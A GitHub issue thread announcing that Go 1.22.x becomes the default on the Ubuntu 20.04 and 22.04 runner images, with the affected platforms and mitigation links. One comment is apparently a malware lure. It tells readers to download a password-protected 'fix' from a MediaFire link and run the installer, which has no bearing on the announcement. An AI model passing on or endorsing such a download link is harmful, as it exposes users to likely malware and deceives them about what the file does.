### ISSUE TITLE
[Ubuntu 20.04 and Ubuntu 22.04  Oses] Go  1.22.x  will be set as default on September, 20

### ISSUE THREAD

**Issue by vidyasagarnimmagaddi** [actions/runner-images#10500]
### Breaking changes

 Go 1.22.x version will be set as default for Ubuntu 20.04 and Ubuntu 22.04 .

### Target date

Image deployment is starting on September 16 and will take 3-4 days.

### The motivation for the changes

As of the [software support](https://github.com/actions/runner-images#software-and-image-support) policy only 3 latest versions of Go are supported.

### Possible impact

 Go 1.22.x version will be set as default for Ubuntu 20.04 and Ubuntu 22.04 .

### Platforms affected

- [X] Azure DevOps
- [X] GitHub Actions

### Runner images affected

- [X] Ubuntu 20.04
- [X] Ubuntu 22.04
- [ ] Ubuntu 24.04
- [ ] macOS 12
- [ ] macOS 13
- [ ] macOS 13 Arm64
- [ ] macOS 14
- [ ] macOS 14 Arm64
- [ ] Windows Server 2019
- [ ] Windows Server 2022

### Mitigation ways

https://github.com/actions/setup-go action for GH actions
https://docs.microsoft.com/en-us/azure/devops/pipelines/tasks/tool/go-tool?view=azure-devops task for AzDO

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by habandy** [comment]
this will solve #10436
